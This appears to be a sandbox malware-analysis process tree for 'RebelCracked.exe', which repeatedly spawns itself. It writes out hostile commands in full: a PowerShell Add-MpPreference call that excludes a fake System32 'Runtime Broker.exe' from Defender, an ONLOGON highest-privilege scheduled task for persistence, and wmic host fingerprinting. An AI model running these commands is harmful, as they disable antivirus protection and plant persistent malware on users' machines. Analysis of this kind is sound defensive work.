C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /F /TN "Runtime Broker" /SC ONLOGON /TR "C:\Windows\System32\Runtime Broker.exe" /RL HIGHEST57⤵PID:4852
-
-
C:\Windows\System32\Runtime Broker.exe"C:\Windows\System32\Runtime Broker.exe"57⤵PID:4308
-
C:\Windows\System32\Runtime Broker.exe"C:\Windows\System32\Runtime Broker.exe"58⤵PID:6824
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "ver"59⤵PID:5788
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV160⤵PID:5828
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RebelCracked.exe"C:\Users\Admin\AppData\Local\Temp\RebelCracked.exe"57⤵
- Drops file in System32 directory
PID:3160 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\Runtime Broker.exe'58⤵PID:3296
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /F /TN "Runtime Broker" /SC ONLOGON /TR "C:\Windows\System32\Runtime Broker.exe" /RL HIGHEST58⤵PID:6264
-
-
C:\Windows\System32\Runtime Broker.exe"C:\Windows\System32\Runtime Broker.exe"58⤵PID:5768
-
C:\Windows\System32\Runtime Broker.exe"C:\Windows\System32\Runtime Broker.exe"59⤵PID:5432
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "ver"60⤵PID:1984
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RebelCracked.exe"C:\Users\Admin\AppData\Local\Temp\RebelCracked.exe"58⤵PID:6184
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\Runtime Broker.exe'59⤵PID:4044
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /F /TN "Runtime Broker" /SC ONLOGON /TR "C:\Windows\System32\Runtime Broker.exe" /RL HIGHEST59⤵PID:3004
-
-
C:\Windows\System32\Runtime Broker.exe"C:\Windows\System32\Runtime Broker.exe"59⤵PID:200
-
C:\Windows\System32\Runtime Broker.exe"C:\Windows\System32\Runtime Broker.exe"60⤵PID:7028
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "ver"61⤵PID:4516
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV162⤵PID:5412
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RebelCracked.exe"C:\Users\Admin\AppData\Local\Temp\RebelCracked.exe"59⤵PID:1056
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\Runtime Broker.exe'60⤵PID:3636
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /F /TN "Runtime Broker" /SC ONLOGON /TR "C:\Windows\System32\Runtime Broker.exe" /RL HIGHEST60⤵PID:6056
-
-
C:\Windows\System32\Runtime Broker.exe"C:\Windows\System32\Runtime Broker.exe"60⤵PID:6808
-
C:\Windows\System32\Runtime Broker.exe"C:\Windows\System32\Runtime Broker.exe"61⤵PID:5780
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "ver"62⤵PID:6584
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RebelCracked.exe"C:\Users\Admin\AppData\Local\Temp\RebelCracked.exe"60⤵PID:3948
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\Runtime Broker.exe'61⤵PID:5396
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /F /TN "Runtime Broker" /SC ONLOGON /TR "C:\Windows\System32\Runtime Broker.exe" /RL HIGHEST61⤵
- Scheduled Task/Job: Scheduled Task
PID:4944
-
-
C:\Windows\System32\Runtime Broker.exe"C:\Windows\System32\Runtime Broker.exe"61⤵PID:5496
-
C:\Windows\System32\Runtime Broker.exe"C:\Windows\System32\Runtime Broker.exe"62⤵PID:6392
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "ver"63⤵PID:6568
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RebelCracked.exe"C:\Users\Admin\AppData\Local\Temp\RebelCracked.exe"61⤵
- Drops file in System32 directory
PID:2280 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\Runtime Broker.exe'62⤵PID:6820
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /F /TN "Runtime Broker" /SC ONLOGON /TR "C:\Windows\System32\Runtime Broker.exe" /RL HIGHEST62⤵PID:4668
-
-
C:\Windows\System32\Runtime Broker.exe"C:\Windows\System32\Runtime Broker.exe"62⤵PID:4624
-
C:\Windows\System32\Runtime Broker.exe"C:\Windows\System32\Runtime Broker.exe"63⤵PID:4300
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "ver"64⤵PID:2456
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"64⤵PID:1584
-
C:\Windows\System32\Wbem\WMIC.exewmic csproduct get uuid65⤵PID:5848
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"64⤵PID:6664
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name65⤵
- Detects videocard installed
PID:5616
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RebelCracked.exe"C:\Users\Admin\AppData\Local\Temp\RebelCracked.exe"62⤵PID:892
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\Runtime Broker.exe'63⤵
- Command and Scripting Interpreter: PowerShell
PID:2700
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /F /TN "Runtime Broker" /SC ONLOGON /TR "C:\Windows\System32\Runtime Broker.exe" /RL HIGHEST63⤵PID:2312
-
-
C:\Windows\System32\Runtime Broker.exe"C:\Windows\System32\Runtime Broker.exe"63⤵PID:5704
-
C:\Windows\System32\Runtime Broker.exe"C:\Windows\System32\Runtime Broker.exe"64⤵PID:6688
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "ver"65⤵PID:5996
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RebelCracked.exe"C:\Users\Admin\AppData\Local\Temp\RebelCracked.exe"63⤵PID:4932
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\Runtime Broker.exe'64⤵PID:6284
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /F /TN "Runtime Broker" /SC ONLOGON /TR "C:\Windows\System32\Runtime Broker.exe" /RL HIGHEST64⤵PID:4744
-
-
C:\Windows\System32\Runtime Broker.exe"C:\Windows\System32\Runtime Broker.exe"64⤵PID:2280
-
C:\Windows\System32\Runtime Broker.exe"C:\Windows\System32\Runtime Broker.exe"65⤵PID:4812
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "ver"66⤵PID:7092
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RebelCracked.exe"C:\Users\Admin\AppData\Local\Temp\RebelCracked.exe"64⤵PID:5248
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\Runtime Broker.exe'65⤵PID:1676
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /F /TN "Runtime Broker" /SC ONLOGON /TR "C:\Windows\System32\Runtime Broker.exe" /RL HIGHEST65⤵PID:6872
-
-
C:\Windows\System32\Runtime Broker.exe"C:\Windows\System32\Runtime Broker.exe"65⤵PID:6772
-
C:\Windows\System32\Runtime Broker.exe"C:\Windows\System32\Runtime Broker.exe"66⤵PID:4156
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "ver"67⤵PID:6712
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RebelCracked.exe"C:\Users\Admin\AppData\Local\Temp\RebelCracked.exe"65⤵
- Drops file in System32 directory
PID:5952 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\Runtime Broker.exe'66⤵
- Command and Scripting Interpreter: PowerShell
PID:5464
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /F /TN "Runtime Broker" /SC ONLOGON /TR "C:\Windows\System32\Runtime Broker.exe" /RL HIGHEST66⤵PID:7000
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV167⤵PID:2908
-
-
-
C:\Windows\System32\Runtime Broker.exe"C:\Windows\System32\Runtime Broker.exe"66⤵PID:7152
-
C:\Windows\System32\Runtime Broker.exe"C:\Windows\System32\Runtime Broker.exe"67⤵
- Blocklisted process makes network request
PID:2648 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "ver"68⤵PID:3928
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RebelCracked.exe"C:\Users\Admin\AppData\Local\Temp\RebelCracked.exe"66⤵PID:5344
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\Runtime Broker.exe'67⤵
- Command and Scripting Interpreter: PowerShell
PID:2920
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /F /TN "Runtime Broker" /SC ONLOGON /TR "C:\Windows\System32\Runtime Broker.exe" /RL HIGHEST67⤵PID:6740
-
-
C:\Windows\System32\Runtime Broker.exe"C:\Windows\System32\Runtime Broker.exe"67⤵PID:1984
-
C:\Windows\System32\Runtime Broker.exe"C:\Windows\System32\Runtime Broker.exe"68⤵PID:4660
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "ver"69⤵PID:4844
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RebelCracked.exe"C:\Users\Admin\AppData\Local\Temp\RebelCracked.exe"67⤵PID:5168
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\Runtime Broker.exe'68⤵PID:7004
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /F /TN "Runtime Broker" /SC ONLOGON /TR "C:\Windows\System32\Runtime Broker.exe" /RL HIGHEST68⤵PID:4700
-
-
C:\Windows\System32\Runtime Broker.exe"C:\Windows\System32\Runtime Broker.exe"68⤵PID:4820
-
C:\Windows\System32\Runtime Broker.exe"C:\Windows\System32\Runtime Broker.exe"69⤵PID:6484
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "ver"70⤵PID:4964
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RebelCracked.exe"C:\Users\Admin\AppData\Local\Temp\RebelCracked.exe"68⤵PID:6884
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\Runtime Broker.exe'69⤵PID:6012
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /F /TN "Runtime Broker" /SC ONLOGON /TR "C:\Windows\System32\Runtime Broker.exe" /RL HIGHEST69⤵PID:596
-
-
C:\Windows\System32\Runtime Broker.exe"C:\Windows\System32\Runtime Broker.exe"69⤵PID:5648
-
C:\Windows\System32\Runtime Broker.exe"C:\Windows\System32\Runtime Broker.exe"70⤵PID:1780
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "ver"71⤵PID:912
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RebelCracked.exe"C:\Users\Admin\AppData\Local\Temp\RebelCracked.exe"69⤵PID:6836
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\Runtime Broker.exe'70⤵PID:4828
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV171⤵PID:4724
-
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /F /TN "Runtime Broker" /SC ONLOGON /TR "C:\Windows\System32\Runtime Broker.exe" /RL HIGHEST70⤵PID:4944
-
-
C:\Windows\System32\Runtime Broker.exe"C:\Windows\System32\Runtime Broker.exe"70⤵PID:2196
-
C:\Windows\System32\Runtime Broker.exe"C:\Windows\System32\Runtime Broker.exe"71⤵PID:2616
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "ver"72⤵PID:3004
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RebelCracked.exe"C:\Users\Admin\AppData\Local\Temp\RebelCracked.exe"70⤵PID:3540
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\Runtime Broker.exe'71⤵PID:2488
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /F /TN "Runtime Broker" /SC ONLOGON /TR "C:\Windows\System32\Runtime Broker.exe" /RL HIGHEST71⤵PID:712
-
-
C:\Windows\System32\Runtime Broker.exe"C:\Windows\System32\Runtime Broker.exe"71⤵PID:1604
-
C:\Windows\System32\Runtime Broker.exe"C:\Windows\System32\Runtime Broker.exe"72⤵PID:5984
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "ver"73⤵PID:1692
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RebelCracked.exe"C:\Users\Admin\AppData\Local\Temp\RebelCracked.exe"71⤵
- Drops file in System32 directory
PID:6500 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\Runtime Broker.exe'72⤵
- Command and Scripting Interpreter: PowerShell
PID:5912
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /F /TN "Runtime Broker" /SC ONLOGON /TR "C:\Windows\System32\Runtime Broker.exe" /RL HIGHEST72⤵PID:852
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV173⤵PID:6836
-
-
-
C:\Windows\System32\Runtime Broker.exe"C:\Windows\System32\Runtime Broker.exe"72⤵PID:6548
-
C:\Windows\System32\Runtime Broker.exe"C:\Windows\System32\Runtime Broker.exe"73⤵PID:7004
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "ver"74⤵PID:1720
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RebelCracked.exe"C:\Users\Admin\AppData\Local\Temp\RebelCracked.exe"72⤵PID:5976
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\Runtime Broker.exe'73⤵PID:3328
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /F /TN "Runtime Broker" /SC ONLOGON /TR "C:\Windows\System32\Runtime Broker.exe" /RL HIGHEST73⤵PID:2920
-
-
C:\Windows\System32\Runtime Broker.exe"C:\Windows\System32\Runtime Broker.exe"73⤵PID:4308
-
C:\Windows\System32\Runtime Broker.exe"C:\Windows\System32\Runtime Broker.exe"74⤵PID:420
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "ver"75⤵PID:6916
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RebelCracked.exe"C:\Users\Admin\AppData\Local\Temp\RebelCracked.exe"73⤵PID:904
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\Runtime Broker.exe'74⤵PID:3372
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /F /TN "Runtime Broker" /SC ONLOGON /TR "C:\Windows\System32\Runtime Broker.exe" /RL HIGHEST74⤵PID:4024
-
-
C:\Windows\System32\Runtime Broker.exe"C:\Windows\System32\Runtime Broker.exe"74⤵PID:5376
-
C:\Windows\System32\Runtime Broker.exe"C:\Windows\System32\Runtime Broker.exe"75⤵PID:3624
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "ver"76⤵PID:2844
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"76⤵PID:432
-
C:\Windows\System32\Wbem\WMIC.exewmic csproduct get uuid77⤵PID:6512
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"76⤵PID:5504
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV177⤵PID:6800
-
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name77⤵
- Detects videocard installed
PID:3628
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RebelCracked.exe"C:\Users\Admin\AppData\Local\Temp\RebelCracked.exe"74⤵PID:1052
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\Runtime Broker.exe'75⤵
- Command and Scripting Interpreter: PowerShell
PID:6308 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV176⤵PID:2436
-
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /F /TN "Runtime Broker" /SC ONLOGON /TR "C:\Windows\System32\Runtime Broker.exe" /RL HIGHEST75⤵PID:896
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV176⤵PID:6972
-
-
-
C:\Windows\System32\Runtime Broker.exe"C:\Windows\System32\Runtime Broker.exe"75⤵PID:5004
-
C:\Windows\System32\Runtime Broker.exe"C:\Windows\System32\Runtime Broker.exe"76⤵PID:4932
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "ver"77⤵PID:5784
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RebelCracked.exe"C:\Users\Admin\AppData\Local\Temp\RebelCracked.exe"75⤵PID:7048
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\Runtime Broker.exe'76⤵PID:6572
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV177⤵PID:5496
-
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /F /TN "Runtime Broker" /SC ONLOGON /TR "C:\Windows\System32\Runtime Broker.exe" /RL HIGHEST76⤵PID:1056
-
-
C:\Windows\System32\Runtime Broker.exe"C:\Windows\System32\Runtime Broker.exe"76⤵PID:5468
-
C:\Windows\System32\Runtime Broker.exe"C:\Windows\System32\Runtime Broker.exe"77⤵PID:3212
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "ver"78⤵PID:5880
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RebelCracked.exe"C:\Users\Admin\AppData\Local\Temp\RebelCracked.exe"76⤵PID:6308
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\Runtime Broker.exe'77⤵
- Command and Scripting Interpreter: PowerShell
PID:4108
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /F /TN "Runtime Broker" /SC ONLOGON /TR "C:\Windows\System32\Runtime Broker.exe" /RL HIGHEST77⤵PID:3124
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV178⤵PID:6560
-
-
-
C:\Windows\System32\Runtime Broker.exe"C:\Windows\System32\Runtime Broker.exe"77⤵PID:6132
-
C:\Windows\System32\Runtime Broker.exe"C:\Windows\System32\Runtime Broker.exe"78⤵PID:5732
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "ver"79⤵PID:1648
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RebelCracked.exe"C:\Users\Admin\AppData\Local\Temp\RebelCracked.exe"77⤵PID:3508
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\Runtime Broker.exe'78⤵PID:2360
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /F /TN "Runtime Broker" /SC ONLOGON /TR "C:\Windows\System32\Runtime Broker.exe" /RL HIGHEST78⤵PID:656
-
-
C:\Windows\System32\Runtime Broker.exe"C:\Windows\System32\Runtime Broker.exe"78⤵PID:3340
-
C:\Windows\System32\Runtime Broker.exe"C:\Windows\System32\Runtime Broker.exe"79⤵PID:3304
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "ver"80⤵PID:1792
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RebelCracked.exe"C:\Users\Admin\AppData\Local\Temp\RebelCracked.exe"78⤵PID:568
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\Runtime Broker.exe'79⤵PID:4012
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /F /TN "Runtime Broker" /SC ONLOGON /TR "C:\Windows\System32\Runtime Broker.exe" /RL HIGHEST79⤵PID:1952
-
-
C:\Windows\System32\Runtime Broker.exe"C:\Windows\System32\Runtime Broker.exe"79⤵PID:5376
-
C:\Windows\System32\Runtime Broker.exe"C:\Windows\System32\Runtime Broker.exe"80⤵PID:6228
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "ver"81⤵PID:1460
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RebelCracked.exe"C:\Users\Admin\AppData\Local\Temp\RebelCracked.exe"79⤵
- Drops file in System32 directory
PID:6940 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\Runtime Broker.exe'80⤵
- Command and Scripting Interpreter: PowerShell
PID:4276
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /F /TN "Runtime Broker" /SC ONLOGON /TR "C:\Windows\System32\Runtime Broker.exe" /RL HIGHEST80⤵PID:6508
-
-
C:\Windows\System32\Runtime Broker.exe"C:\Windows\System32\Runtime Broker.exe"80⤵PID:860
-
C:\Windows\System32\Runtime Broker.exe"C:\Windows\System32\Runtime Broker.exe"81⤵PID:3372
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "ver"82⤵PID:3096
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RebelCracked.exe"C:\Users\Admin\AppData\Local\Temp\RebelCracked.exe"80⤵
- Drops file in System32 directory
PID:7088 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\Runtime Broker.exe'81⤵PID:1924
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /F /TN "Runtime Broker" /SC ONLOGON /TR "C:\Windows\System32\Runtime Broker.exe" /RL HIGHEST81⤵PID:1184
-
-
C:\Windows\System32\Runtime Broker.exe"C:\Windows\System32\Runtime Broker.exe"81⤵PID:1580
-
C:\Windows\System32\Runtime Broker.exe"C:\Windows\System32\Runtime Broker.exe"82⤵
- Blocklisted process makes network request
PID:796 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "ver"83⤵PID:5284
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RebelCracked.exe"C:\Users\Admin\AppData\Local\Temp\RebelCracked.exe"81⤵
- Drops file in System32 directory
PID:3944 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\Runtime Broker.exe'82⤵
- Command and Scripting Interpreter: PowerShell
PID:1984
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /F /TN "Runtime Broker" /SC ONLOGON /TR "C:\Windows\System32\Runtime Broker.exe" /RL HIGHEST82⤵PID:5908
-
-
C:\Windows\System32\Runtime Broker.exe"C:\Windows\System32\Runtime Broker.exe"82⤵PID:1484
-
C:\Windows\System32\Runtime Broker.exe"C:\Windows\System32\Runtime Broker.exe"83⤵PID:7056
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "ver"84⤵PID:2360
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RebelCracked.exe"C:\Users\Admin\AppData\Local\Temp\RebelCracked.exe"82⤵PID:3920
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\Runtime Broker.exe'83⤵PID:4808
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /F /TN "Runtime Broker" /SC ONLOGON /TR "C:\Windows\System32\Runtime Broker.exe" /RL HIGHEST83⤵
- Scheduled Task/Job: Scheduled Task
PID:6780
-
-
C:\Windows\System32\Runtime Broker.exe"C:\Windows\System32\Runtime Broker.exe"83⤵PID:1036
-
C:\Windows\System32\Runtime Broker.exe"C:\Windows\System32\Runtime Broker.exe"84⤵PID:1600
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "ver"85⤵PID:5324
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RebelCracked.exe"C:\Users\Admin\AppData\Local\Temp\RebelCracked.exe"83⤵PID:7160
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\Runtime Broker.exe'84⤵PID:5348
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /F /TN "Runtime Broker" /SC ONLOGON /TR "C:\Windows\System32\Runtime Broker.exe" /RL HIGHEST84⤵
- Scheduled Task/Job: Scheduled Task
PID:3928 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV185⤵PID:5976
-
-
-
C:\Windows\System32\Runtime Broker.exe"C:\Windows\System32\Runtime Broker.exe"84⤵PID:3336
-
C:\Windows\System32\Runtime Broker.exe"C:\Windows\System32\Runtime Broker.exe"85⤵PID:4480
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "ver"86⤵PID:2588
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RebelCracked.exe"C:\Users\Admin\AppData\Local\Temp\RebelCracked.exe"84⤵PID:5724
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\Runtime Broker.exe'85⤵
- Command and Scripting Interpreter: PowerShell
PID:5328
-
-
